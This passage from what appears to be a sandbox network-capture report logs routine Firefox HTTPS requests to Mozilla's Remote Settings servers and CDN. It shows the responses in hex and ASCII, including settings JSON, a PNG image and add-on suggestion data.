a7 a3 14 15 6f a5 22 12 78 4d b8 6c 0b d2 d4 55 41 0a Data Ascii: T6HAA 2BR{&`3l6v\fg]yB>!G(3((X"8/Q>@cS3x`cM"LpirKLNU'h_sbaY.)\|er u$,V,p!<;G."L9yCo"xMlUA
2024-07-26 18:11:02 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	64229	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 930 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	64234	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 931 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	64230	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2610 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	64235	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/32706371-5612-48cb-8cf8-6a1c97906e3c HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840734722158 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 8645 x-goog-hash: crc32c=frY05Q== x-goog-hash: md5=F44rOKCahvbM//RkX+2j5g== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 8645 X-GUploader-UploadID: AHxI1nOHkyaZyLkYliq2W29piZMK1xkxtNyt-xwUhfNLj2AGWbGFM_lOXgR9xN7pMiT57bCPBhrY9YOwIA Server: UploadServer Date: Wed, 24 Jul 2024 17:30:09 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:34 GMT ETag: "178e2b38a09a86f6ccfff4645feda3e6" Content-Type: application/octet-stream Age: 175254 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 09 54 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 Data Ascii: PNGIHDRL\pHYsTiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RD
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 38 32 39 38 34 31 31 35 2d 62 38 64 32 2d 34 33 34 31 2d 62 32 33 36 2d 37 33 65 66 66 31 64 36 34 33 35 33 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 35 39 62 30 37 31 35 35 2d 35 37 38 34 2d 34 38 63 63 2d 61 31 34 66 2d 34 30 35 31 30 64 30 32 65 31 33 39 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 34 35 34 38 43 32 46 43 32 37 41 46 32 45 34 45 36 35 30 34 39 30 45 31 43 46 35 31 45 39 37 41 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f Data Ascii: :xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="adobe:docid:photoshop:82984115-b8d2-4341-b236-73eff1d64353" xmpMM:InstanceID="xmp.iid:59b07155-5784-48cc-a14f-40510d02e139" xmpMM:OriginalDocumentID="4548C2FC27AF2E4E650490E1CF51E97A" dc:format="image/
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 39 35 37 32 36 34 38 31 2d 64 65 36 35 2d 34 64 62 65 2d 61 63 33 34 2d 61 34 36 39 32 61 35 39 35 39 64 31 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 34 35 34 38 43 32 46 43 32 37 41 46 32 45 34 45 36 35 30 34 39 30 45 31 43 46 35 31 45 39 37 41 22 20 73 74 52 65 66 3a 6f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 34 35 34 38 43 32 46 43 32 37 41 46 32 45 34 45 36 35 30 34 39 30 45 31 43 46 35 31 45 39 37 41 22 2f 3e 20 3c 74 69 66 66 3a 42 69 74 73 50 65 72 53 61 6d 70 6c 65 3e 20 3c 72 64 66 3a 53 65 71 3e 20 3c 72 64 66 3a 6c 69 3e 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 3c 2f Data Ascii: ef:instanceID="xmp.iid:95726481-de65-4dbe-ac34-a4692a5959d1" stRef:documentID="4548C2FC27AF2E4E650490E1CF51E97A" stRef:originalDocumentID="4548C2FC27AF2E4E650490E1CF51E97A"/> <tiff:BitsPerSample> <rdf:Seq> <rdf:li>8</rdf:li> <rdf:li>8</rdf:li> <rdf:li>8</
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 7a b5 37 ea e6 08 20 07 ab e4 54 1a a5 68 31 53 82 b8 7b 63 26 1f 7b ae 5c bd 5a de ff c1 70 f9 6f d5 97 ad 68 b5 b5 cd 77 ce a9 b1 ad 78 e6 85 b0 7d 9a cc 35 0b f9 b2 11 5e 73 c0 c8 e0 52 50 6b 0f 44 a4 e6 4c 0c b1 12 c6 28 c5 32 02 48 08 a8 b4 66 2c 37 50 18 3c 72 2d 6e ba 3e bd f3 6d b3 57 5e 53 fd d1 bd bc ea 28 c9 a2 97 0e 0f e0 92 7a 34 0e ba 26 80 9b 90 22 64 d3 11 6c 65 96 84 cb a8 96 36 3e 35 33 58 d3 2b ae ac 7e e8 8a 81 55 cb 8b f9 77 4f 02 e9 f1 a7 ca 6f dc 3d fc 8f f7 e9 e3 0f f1 d4 b3 79 53 39 05 08 db 70 5d 96 0d cf 1c 7f cc f4 1b 4f 1d 39 e3 b4 ca aa b5 90 ac 04 32 05 c8 2a a6 ea 9e 87 50 9d 7b 12 01 64 44 04 ad a8 34 04 f1 df 9f 1a ee ff 8e 5e fa d1 f4 e7 37 0c 2c 59 a9 4b 0e 34 df 16 2d 82 42 4f 06 41 d7 04 20 b8 31 15 90 ac 51 65 ad f8 Data Ascii: z7 Th1S{c&{\Zpohwx}5^sRPkDL(2Hf,7P<r-n>mW^S(z4&"dle6>53X+~UwOo=yS9p]O92*P{dD4^7,YK4-BOA 1Qe
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 6c 70 06 02 c8 e2 86 27 67 cf 3b 57 3f f1 11 07 82 e7 91 18 70 50 22 42 de c8 f9 63 7f bc 34 2e 61 0a 65 2c 95 88 94 d1 66 76 c7 dc 26 9e 00 76 ce 51 5f ba c4 4a bb ea 9a 72 1f 3e a4 93 92 b9 01 72 e1 05 30 07 35 f7 3f 01 40 10 08 95 d2 1c 48 16 dd d6 6f d9 7e fc 29 d5 5b 3f 65 00 3b 04 e2 82 24 ac 5e 75 a0 bc e9 d6 ec f1 87 71 d0 28 34 d1 5c bb b7 17 e5 bd 73 4d 58 91 48 7d f5 8a da f7 be 97 ee bc 6b 6f c1 92 2e ad 93 02 50 7d f3 9b ed 88 13 30 31 b9 30 35 d9 07 16 4c 00 86 16 a8 78 aa 00 b3 b2 f5 c5 66 1c 28 bf 76 73 35 0e 57 74 a6 70 83 86 d2 9a a5 95 89 b8 9c d8 ca 9f fb bc 54 57 15 11 e0 32 24 b0 c3 c2 02 f6 39 87 45 e7 19 97 8c 69 69 ba fe 53 7b 71 41 3a d4 43 c1 26 48 34 14 9b 6f 7a 1d 26 26 f6 b3 73 00 01 06 12 94 29 1a a7 a8 13 5b f8 53 bf bf ec Data Ascii: lp'g;W?pP"Bc4.ae,fv&vQ_Jr>r05?@Ho~)[?e;$^uq(4\sMXH}ko.P}0105Lxf(vs5WtpTW2$9EiiS{qA:C&H4oz&&s)[S
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 6b 50 02 57 60 20 05 10 7e 7c 5f 7d 7a 13 62 1d 73 f3 64 67 af 1f e9 e8 14 e4 44 0e 82 80 08 e0 81 3a 4b 16 4b 66 a3 ae 67 c7 ba 24 43 a5 e2 f5 6c cf 6d 49 90 44 46 59 01 14 3f 78 94 51 dd af e3 82 e6 a0 d6 19 9e c1 0e 00 3c 3c a0 d5 2a 4a 86 c1 18 5d 0d c6 27 a0 d0 34 3c 60 4b 46 80 5d 8b 36 82 a1 95 1c 0b 6a 8c c7 fb 1f c6 e0 92 ae d5 ae b3 5d b1 35 7d b6 04 a0 65 23 f9 92 9a 2b e0 dc 69 3f df ce 90 11 50 2a 86 eb be 6c 04 ad 5d d0 4b 5f 76 10 2c b1 09 a0 f7 de 1b 9e 78 02 23 c3 fb 63 60 d6 5e f0 e5 cb 8b 91 25 66 0d 90 40 a1 1d 3c 5d ee 52 b0 03 94 8a 3c 8e 8e 66 59 00 b0 8b 39 94 dc 55 8d 88 1d 48 7f fb 6d f2 a6 87 ee 65 6e 75 f6 20 36 67 61 6f c5 38 0f 0c 85 65 07 53 63 8b 12 4b 01 93 ce 5a 19 5f 52 0b b0 7a 91 4a 5d b3 9a 00 c0 77 b1 81 18 3b 31 22 Data Ascii: kPW` ~\|_}zbsdgD:KKfg$ClmIDFY?xQ<<J]'4<`KF]6j]5}e#+i?Pl]K_v,x#c`^%f@<]R<fY9UHmenu 6gao8eScKZ_RzJ]w;1"
2024-07-26 18:11:03 UTC	993	IN	Data Raw: fd e4 81 c1 43 0f 81 06 d0 8e 2e df e3 6b 74 7b 76 71 ab 83 13 32 4f 36 1c d8 bf 70 dd d4 88 57 af ff 74 a5 26 38 88 ca 98 42 f2 f9 68 8a 7d 40 2c a6 41 df f8 dc 94 6e 29 3f 7d cb d0 fb 2e ce 00 58 e9 e4 cd 90 39 90 7f e3 3b e9 82 ff 14 a7 c6 f4 c8 83 2c af 38 55 09 b3 bd 99 71 76 a3 87 23 c0 95 8d 9c 28 a9 03 c3 d7 5d 3f f5 d9 9b b7 10 d1 fa a7 82 95 4c 55 52 99 bb 46 6c cf d3 c3 7c 0e 06 13 72 4f cf 3e 38 36 5a f1 2f 7f 7d f4 7d 17 67 40 2a ad 20 06 65 0c 14 d7 dd ac 6f 3b 7b 70 76 a6 be e6 50 94 d5 24 1a 7d b2 9b e6 b6 9f 4d cf 04 20 a0 4a 88 81 3c c0 bd 70 60 c9 e5 17 57 ef f9 db b1 37 bc 45 37 bc 68 cf 6f 70 ca 61 48 c1 55 e0 4e a6 6c ce c6 ac 04 27 42 4a e0 c2 bd c4 86 4d d3 2f 3c 33 71 f6 39 d9 ff be 6b f0 9c 5f 05 a0 9e 52 e4 8c a4 b9 7d 6c ea dc Data Ascii: C.kt{vq2O6pWt&8Bh}@,An)?}.X9;,8Uqv#(]?LURFl\|rO>86Z/}}g@* eo;{pvP$}M J<p`W7E7hopaHUNl'BJM/<3q9k_R}l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	64238	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	339	OUT	GET /main-workspace/quicksuggest/bea0c2fe-9c8c-4351-9ede-4051baa1ed47.json HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	696	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ACJd0Npy_SqjfaTfHZCu6IZ6ZnJRz4hauu0rzZ-8gZ2NrM1Ks8MmQoKP1Z7XUVIP6lvKmHNIB4A x-goog-generation: 1701479170453754 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 4067 x-goog-hash: crc32c=emXBgg== x-goog-hash: md5=of1HHRfoIglelcoNgtMdtg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 4067 Server: UploadServer Date: Fri, 19 Jul 2024 22:27:02 GMT Cache-Control: public,max-age=604800 Age: 589441 Last-Modified: Sat, 02 Dec 2023 01:06:10 GMT ETag: "a1fd471d17e822095e95ca0d82d31db6" Content-Type: application/json Vary: Accept-Encoding Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	694	IN	Data Raw: 5b 7b 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 45 61 73 69 6c 79 20 64 6f 77 6e 6c 6f 61 64 20 76 69 64 65 6f 73 20 66 72 6f 6d 20 6d 6f 73 74 20 70 6f 70 75 6c 61 72 20 76 69 64 65 6f 20 73 69 74 65 73 20 5c 75 32 30 31 34 20 59 6f 75 54 75 62 65 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 56 69 6d 65 6f 2c 20 54 77 69 74 63 68 2c 20 61 6e 64 20 6d 6f 72 65 2e 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 64 64 6f 6e 73 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 65 6e 2d 55 53 2f 66 69 72 65 66 6f 78 2f 61 64 64 6f 6e 2f 76 69 64 65 6f 2d 64 6f 77 6e 6c 6f 61 64 68 65 6c 70 65 72 2f 22 2c 20 22 67 75 69 64 22 3a 20 22 7b 62 39 64 62 31 36 61 34 2d 36 65 64 63 2d 34 37 65 63 2d 61 31 66 34 2d 62 38 36 32 39 32 65 64 32 31 31 64 7d 22 2c 20 22 69 Data Ascii: [{"description": "Easily download videos from most popular video sites \u2014 YouTube, Facebook, Vimeo, Twitch, and more.", "url": "https://addons.mozilla.org/en-US/firefox/addon/video-downloadhelper/", "guid": "{b9db16a4-6edc-47ec-a1f4-b86292ed211d}", "i
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 69 6e 67 2c 20 61 6e 64 20 73 74 79 6c 65 20 68 65 6c 70 20 61 6e 79 77 68 65 72 65 20 79 6f 75 20 77 72 69 74 65 20 6f 6e 6c 69 6e 65 20 5c 75 32 30 31 34 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 2c 20 65 6d 61 69 6c 2c 20 64 6f 63 73 2c 20 61 6e 64 20 6d 6f 72 65 2e 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 64 64 6f 6e 73 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 65 6e 2d 55 53 2f 66 69 72 65 66 6f 78 2f 61 64 64 6f 6e 2f 6c 61 6e 67 75 61 67 65 74 6f 6f 6c 2f 22 2c 20 22 67 75 69 64 22 3a 20 22 6c 61 6e 67 75 61 67 65 74 6f 6f 6c 2d 77 65 62 65 78 74 65 6e 73 69 6f 6e 40 6c 61 6e 67 75 61 67 65 74 6f 6f 6c 2e 6f 72 67 22 2c 20 22 69 63 6f 6e 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 64 64 6f 6e 73 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 75 73 Data Ascii: ing, and style help anywhere you write online \u2014 social media, email, docs, and more.", "url": "https://addons.mozilla.org/en-US/firefox/addon/languagetool/", "guid": "languagetool-webextension@languagetool.org", "icon": "https://addons.mozilla.org/us
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 72 61 74 69 6e 67 73 22 3a 20 31 33 35 36 2c 20 22 74 69 74 6c 65 22 3a 20 22 53 65 61 72 63 68 20 62 79 20 49 6d 61 67 65 22 2c 20 22 6b 65 79 77 6f 72 64 73 22 3a 20 5b 22 61 6c 74 20 73 65 61 72 63 68 22 2c 20 22 69 6d 61 67 65 20 66 69 6e 64 65 72 22 2c 20 22 69 6d 61 67 65 20 68 69 73 74 6f 72 79 22 2c 20 22 69 6d 61 67 65 20 69 6e 76 65 73 74 69 67 61 74 6f 72 22 2c 20 22 69 6d 61 67 65 20 6c 6f 63 61 74 6f 72 22 2c 20 22 69 6d 61 67 65 20 73 65 61 72 63 68 22 2c 20 22 70 69 63 73 20 73 65 61 72 63 68 22 2c 20 22 72 65 76 65 72 73 65 20 69 6d 61 67 65 20 73 65 61 72 63 68 22 2c 20 22 72 65 76 65 72 73 65 20 73 65 61 72 63 68 22 2c 20 22 73 65 61 72 63 68 20 62 79 20 69 6d 61 67 65 22 2c 20 22 74 69 6e 65 79 65 22 2c 20 22 76 69 73 75 61 6c 20 73 65 Data Ascii: ratings": 1356, "title": "Search by Image", "keywords": ["alt search", "image finder", "image history", "image investigator", "image locator", "image search", "pics search", "reverse image search", "reverse search", "search by image", "tineye", "visual se
2024-07-26 18:11:03 UTC	593	IN	Data Raw: 22 3a 20 22 4c 69 73 74 65 6e 20 74 6f 20 77 65 62 20 70 61 67 65 73 20 72 65 61 64 20 61 6c 6f 75 64 20 69 6e 20 34 30 2b 20 6c 61 6e 67 75 61 67 65 73 20 77 69 74 68 20 63 75 73 74 6f 6d 69 7a 61 62 6c 65 20 72 65 61 64 69 6e 67 20 73 70 65 65 64 2e 20 53 75 70 70 6f 72 74 73 20 50 44 46 20 61 6e 64 20 45 50 55 42 2e 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 64 64 6f 6e 73 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 66 69 72 65 66 6f 78 2f 61 64 64 6f 6e 2f 72 65 61 64 2d 61 6c 6f 75 64 2f 22 2c 20 22 67 75 69 64 22 3a 20 22 7b 64 64 63 36 32 34 30 30 2d 66 32 32 64 2d 34 64 64 33 2d 38 62 34 61 2d 30 35 38 33 37 64 65 35 33 63 32 65 7d 22 2c 20 22 69 63 6f 6e 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 64 64 6f 6e 73 2e 6d 6f 7a 69 6c 6c 61 2e Data Ascii: ": "Listen to web pages read aloud in 40+ languages with customizable reading speed. Supports PDF and EPUB.", "url": "https://addons.mozilla.org/firefox/addon/read-aloud/", "guid": "{ddc62400-f22d-4dd3-8b4a-05837de53c2e}", "icon": "https://addons.mozilla.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	64237	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/8e264f27-207e-4cfd-84c9-8ea2fce78243 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
